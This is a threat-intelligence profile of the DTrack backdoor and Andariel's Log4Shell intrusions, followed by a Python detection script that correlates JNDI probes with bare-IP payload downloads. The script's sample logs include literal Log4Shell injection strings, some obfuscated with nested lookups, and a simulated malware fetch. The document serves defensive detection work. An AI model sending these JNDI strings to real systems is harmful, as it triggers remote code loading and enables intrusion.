Dtrack Backdoor

Malware Profile Updated 13 days ago
DTrack is a long-established backdoor associated with the North Korean Lazarus group and used heavily by its Andariel subgroup, an APT that has been linked to a series of high-profile intrusions. In the activity profiled here, Andariel compromised Windows hosts by exploiting the Log4j vulnerability (Log4Shell); the exploit then fetched additional malware from a command-and-control (C2) server, giving the group a foothold in the victim's systems and network, often without the victim noticing.

In 2022 Andariel used this widespread Log4j vulnerability to deploy DTrack and other post-exploitation tools onto the networks of organizations in scientific research fields, including biomedical, genetics, soil science and energy. In at least one case the intrusion ended in a Maui ransomware deployment, carried out after DTrack had been installed. The group's infrastructure was also new in this period: the operators used bare IP addresses with no domain names, a modified build of the DTrack backdoor, and a new variant of the Grease malware.

Researchers were not able to capture the first-stage payload downloaded from the C2 server, but they observed that exploitation was closely followed by the download of DTrack. DTrack is therefore best understood as a second-stage payload that follows an initial compromise rather than as the initial access vector itself, which means detection is most reliable at the exploitation step and at the unusual outbound downloads that follow it. Andariel remains a significant threat because of its continued use of DTrack alongside other mature intrusion techniques.
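The profile above describes a recognisable sequence: a Log4j lookup string arrives in a web request, and within minutes the same server pulls a payload from a bare IP address with no domain name. The following is an added detection example, not code from this page or from any of the cited reports, that looks for that sequence in two constructed log sources: a web-server access log (for the JNDI probe, including the common nested-lookup obfuscations) and an egress/proxy log (for outbound fetches from bare-IP URLs). The log formats, the five-minute correlation window and the sample lines are assumptions for illustration; a real deployment would feed it parsed events from a SIEM.

```python
import re
from datetime import datetime, timedelta
from ipaddress import ip_address
from urllib.parse import urlsplit

# Constructed access-log lines (timestamp, client IP, method, path, status, user-agent).
# These are synthetic and use documentation IP ranges; they are not from any real incident.
ACCESS_LOG = [
    '2022-07-01T10:00:01Z 203.0.113.7 GET /index.html 200 "Mozilla/5.0"',
    '2022-07-01T10:00:05Z 198.51.100.9 GET /api/login 200 "${jndi:ldap://198.51.100.9:1389/a}"',
    '2022-07-01T10:00:09Z 198.51.100.9 GET /api/login 200 "${${lower:j}ndi:${lower:l}dap://198.51.100.9:1389/b}"',
    '2022-07-01T10:01:00Z 203.0.113.8 GET /about 200 "curl/7.79"',
]

# Constructed egress-log lines (timestamp, internal host, destination URL). Also synthetic.
EGRESS_LOG = [
    "2022-07-01T10:00:07Z webserver01 http://198.51.100.9:8080/dtrack.bin",
    "2022-07-01T10:05:00Z webserver01 https://updates.example.com/patch.msi",
    "2022-07-01T12:00:00Z webserver01 http://192.0.2.44/payload",
]

ACCESS_RE = re.compile(r'^(\S+) (\S+) (\S+) (\S+) (\d{3}) "(.*)"$')
JNDI_RE = re.compile(r"\$\{jndi:", re.IGNORECASE)
# Nested lookups used to hide the literal "jndi": ${lower:j}, ${upper:J}, ${::-j}, ${env:NOPE:-j}
OBFUSCATION_RE = re.compile(r"\$\{(lower|upper):([^${}]*)\}|\$\{[^${}]*:-([^${}]*)\}")


def _collapse(m):
    """Replace one obfuscating lookup with the literal text it evaluates to."""
    if m.group(1) == "lower":
        return m.group(2).lower()
    if m.group(1) == "upper":
        return m.group(2).upper()
    return m.group(3)  # ${anything:-default} evaluates to the default


def normalise(s):
    """Strip nested lookup obfuscation until the string stops changing.
    Each substitution removes a ${...} wrapper, so the loop terminates."""
    prev = None
    while prev != s:
        prev, s = s, OBFUSCATION_RE.sub(_collapse, s)
    return s


def parse_ts(s):
    return datetime.strptime(s, "%Y-%m-%dT%H:%M:%SZ")


def find_jndi_probes(access_lines):
    """Return the requests whose path or user-agent carries a JNDI lookup after de-obfuscation."""
    probes = []
    for line in access_lines:
        m = ACCESS_RE.match(line)
        if not m:
            continue  # unparseable line; a real pipeline would count these
        ts, client, _method, path, _status, ua = m.groups()
        for field in (path, ua):
            payload = normalise(field)
            if JNDI_RE.search(payload):
                probes.append({"ts": parse_ts(ts), "client": client, "payload": payload})
                break
    return probes


def is_bare_ip_url(url):
    """True when the URL host is a literal IPv4/IPv6 address rather than a domain name."""
    host = urlsplit(url).hostname
    if host is None:
        return False
    try:
        ip_address(host)
        return True
    except ValueError:
        return False


def correlate(access_lines, egress_lines, window=timedelta(minutes=5)):
    """Alert on an outbound fetch from a bare-IP URL that follows a JNDI probe within the window."""
    probes = find_jndi_probes(access_lines)
    alerts = []
    for line in egress_lines:
        ts_s, host, url = line.split()
        ts = parse_ts(ts_s)
        if not is_bare_ip_url(url):
            continue
        for p in probes:
            if timedelta(0) <= ts - p["ts"] <= window:
                alerts.append({"egress_ts": ts, "host": host, "url": url,
                               "probe_ts": p["ts"], "probe_client": p["client"]})
                break
    return alerts


if __name__ == "__main__":
    for a in correlate(ACCESS_LOG, EGRESS_LOG):
        print(f"{a['host']}: JNDI probe from {a['probe_client']} at {a['probe_ts']} "
              f"followed by bare-IP download {a['url']} at {a['egress_ts']}")
```

The bare-IP fetch at 12:00 is deliberately left unalerted: on its own it is only weak signal, and the point of the correlation is that the probe plus the download inside a short window is what characterises the chain described above. In practice the probe signature should also be run over headers such as X-Forwarded-For and X-Api-Version, since Log4Shell payloads were delivered in any logged field, not only the user-agent.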
Miscellaneous Associations
Other context tags that may help in assessing relevance:
Malware
Exploit
Log4j
Source Document References
Information about the DTrack backdoor was drawn from the source documents listed below (source, age at time of indexing, title).
CERT-EU, 9 months ago: IT threat evolution Q2 2023
CERT-EU, a year ago: Lazarus, Scarcruft North Korean APTs Shift Tactics, Thrive
CERT-EU, a year ago: Kaspersky crimeware report: Andariel's mistakes and EasyRat malware
CERT-EU, a year ago: Log4j bug exploited to push novel EarlyRat malware
CERT-EU, a year ago: Andariel APT Hackers Drop a New Malware On Windows Via Weaponized MS Word Doc
InfoSecurity-magazine, a year ago: Lazarus Group Attack Identified After Operational Security Fail
Securityaffairs, a year ago: North Korean Andariel APT used a new malware named EarlyRat
BankInfoSecurity, a year ago: New Malware by Lazarus-Backed Andariel Group Exploits Log4j